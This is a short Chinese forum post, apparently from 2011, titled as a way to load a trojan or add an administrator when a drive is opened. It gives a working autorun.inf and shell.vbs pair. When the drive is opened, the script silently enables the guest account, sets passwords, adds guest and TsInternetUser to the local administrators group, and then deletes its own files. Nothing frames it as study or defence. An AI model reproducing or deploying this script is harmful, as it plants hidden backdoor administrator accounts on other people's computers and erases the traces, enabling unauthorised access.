灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:1556回复:0

打开硬盘时加载木马或者添加管理员

楼主#
更多 发布于:2011-08-30 10:29
auto.ini 加 SHELL.VBS
autorun.inf内容如下
[autorun]
open=shell.vbs

shell.vbs内容如下
dim wsh
set wsh=CreateObject(WScript.Shell)
wsh.run net user guest activeyes,0
wsh.run net user guest wybanly886,0
wsh.run net localgroup administrators guest add,0
wsh.run net user TsinternetUser wybanly886,0
wsh.run net localgroup administrators TsInternetUser add,0
wsh.run cmd.exe c del autorun.inf,0
wsh.run cmd.exe c del shell.vbs,0
 

喜欢0 评分0
游客

返回顶部